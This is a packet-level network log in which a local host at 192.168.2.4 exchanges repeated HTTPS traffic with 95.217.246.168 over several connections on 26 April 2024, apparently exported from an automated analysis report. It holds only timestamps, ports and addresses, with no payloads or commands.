Apr 26, 2024 11:03:03.083254099 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.083282948 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.083300114 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.083331108 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.083369970 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.086219072 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.086261034 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.086308956 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.086333990 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.086359024 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.086380005 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.088819027 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.088861942 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.088897943 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.088910103 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.088937044 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.088954926 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.092422962 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.092464924 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.092500925 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.092513084 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.092547894 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.092567921 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.095376968 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.095418930 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.095454931 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.095467091 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.095493078 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.095510006 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.098134041 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.098179102 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.098207951 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.098218918 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.098247051 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.098268986 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.102257013 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.102304935 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.102334023 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.102346897 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.102381945 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.102381945 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.104952097 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.105005980 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.105037928 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.105050087 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.105076075 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.105093956 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.108000040 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.108042955 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.108074903 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.108086109 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.108135939 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.108135939 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.110337973 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.110383034 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.110418081 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.110430002 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.110456944 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.110477924 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.113426924 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.113470078 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.113507986 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.113521099 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.113548040 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.113570929 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.116174936 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.116216898 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.116256952 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.116267920 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.116296053 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.116314888 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.118807077 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.118851900 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.118891001 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.118902922 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.118927956 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.118949890 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.121490955 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.121556044 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.121568918 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.121583939 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.121615887 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.121635914 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.124891043 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.124936104 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.124968052 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.124979973 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.125005007 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.125024080 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.127080917 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.127124071 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.127159119 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.127171040 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.127197981 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.127219915 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.129709959 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.129750967 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.129786968 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.129797935 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.129834890 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.129834890 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.132601976 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.132644892 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.132680893 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.132698059 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.132719994 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.132736921 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.135806084 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.135848999 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.135879993 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.135890961 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.135915995 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.135936022 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.138544083 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.138587952 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.138621092 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.138632059 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.138663054 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.138683081 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.141109943 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.141151905 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.141185045 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.141205072 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.141227007 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.141244888 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.145905972 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.145951033 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.145991087 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.146003008 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.146028996 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.146045923 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.148365021 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.148422956 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.148452997 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.148467064 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.148492098 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.148524046 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.151535034 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.151580095 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.151614904 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.151628017 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.151654959 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.151674986 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.153918028 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.153963089 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.153994083 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.154006958 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.154031038 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.154051065 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.156944036 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.156985998 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.157016993 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.157031059 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.157053947 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.157072067 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.159115076 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.159157038 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.159190893 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.159203053 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.159256935 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.159256935 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.161508083 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.161556005 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.161591053 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.161608934 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.161633015 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.161653996 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.164366961 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.164407969 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.164448977 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.164467096 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.164489031 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.164527893 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.166774035 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.166812897 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.166868925 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.166868925 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.166883945 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.166943073 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.167131901 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.167188883 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.167201996 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.167253971 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.167285919 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.167340994 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.167381048 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.167411089 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.232669115 CEST	49737	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.232753038 CEST	443	49737	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.232844114 CEST	49737	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.233047009 CEST	49737	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.233077049 CEST	443	49737	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.760332108 CEST	443	49737	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.760457993 CEST	49737	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.760826111 CEST	49737	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.760858059 CEST	443	49737	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.762279987 CEST	49737	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.762293100 CEST	443	49737	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.762347937 CEST	49737	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.762371063 CEST	443	49737	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:04.314404011 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:04.314502001 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:04.314582109 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:04.314815044 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:04.314830065 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:04.787411928 CEST	443	49737	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:04.787518024 CEST	49737	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:04.787594080 CEST	443	49737	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:04.787626028 CEST	443	49737	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:04.787659883 CEST	49737	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:04.787689924 CEST	49737	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:04.788479090 CEST	49737	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:04.788511992 CEST	443	49737	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:04.844513893 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:04.844609976 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:04.844980955 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:04.845011950 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:04.846523046 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:04.846534967 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:04.846575022 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:04.846597910 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:05.337140083 CEST	49739	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:05.337184906 CEST	443	49739	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:05.337263107 CEST	49739	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:05.337475061 CEST	49739	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:05.337491035 CEST	443	49739	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:05.864691019 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:05.864769936 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:05.864784002 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:05.864837885 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:05.865653038 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:05.865690947 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:05.871803999 CEST	443	49739	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:05.871876955 CEST	49739	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:05.872185946 CEST	49739	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:05.872195005 CEST	443	49739	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:05.873836994 CEST	49739	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:05.873842001 CEST	443	49739	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:06.566684961 CEST	49740	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:06.566783905 CEST	443	49740	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:06.566868067 CEST	49740	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:06.567100048 CEST	49740	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:06.567137957 CEST	443	49740	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:06.952831984 CEST	443	49739	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:06.952980042 CEST	49739	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:06.952992916 CEST	443	49739	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:06.953010082 CEST	443	49739	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:06.953039885 CEST	49739	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:06.953071117 CEST	49739	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:06.966759920 CEST	49739	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:06.966773987 CEST	443	49739	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:07.096637964 CEST	443	49740	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:07.096801996 CEST	49740	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:08.435477018 CEST	49740	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:08.435561895 CEST	443	49740	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:08.437026978 CEST	49740	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:08.437041998 CEST	443	49740	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:08.497955084 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:08.498027086 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:08.498101950 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:08.498476028 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:08.498509884 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:09.032438993 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:09.032520056 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:09.032913923 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:09.032943010 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:09.034564972 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:09.034578085 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:09.446675062 CEST	443	49740	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:09.446762085 CEST	49740	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:09.446808100 CEST	443	49740	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:09.446866989 CEST	49740	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:09.446866989 CEST	443	49740	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:09.446918964 CEST	49740	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:09.447592974 CEST	49740	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:09.447623014 CEST	443	49740	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:09.870548964 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:09.870619059 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:09.870642900 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:09.870668888 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:09.870695114 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:09.870734930 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:09.870770931 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:09.870810986 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:09.990518093 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:09.990566969 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:09.990608931 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:09.990668058 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:09.990703106 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:09.990725040 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:10.171646118 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:10.171699047 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:10.171731949 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:10.171772957 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:10.171804905 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:10.171822071 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:10.280683994 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:10.280734062 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:10.280781031 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:10.280818939 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:10.280852079 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:10.280875921 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:10.375835896 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:10.375884056 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:10.375924110 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:10.375947952 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:10.375977993 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:10.375999928 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:10.445261955 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:10.445305109 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:10.445334911 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:10.445352077 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:10.445380926 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:10.445395947 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:10.491162062 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:10.491205931 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:10.491235018 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:10.491250992 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:10.491276026 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:10.491292953 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:10.549360991 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:10.549410105 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:10.549447060 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:10.549473047 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:10.549501896 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:10.549536943 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:10.599826097 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:10.599868059 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:10.599905014 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:10.599921942 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:10.599953890 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:10.599970102 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:10.647089005 CEST	443	49741	95.217.246.168	192.168.2.4
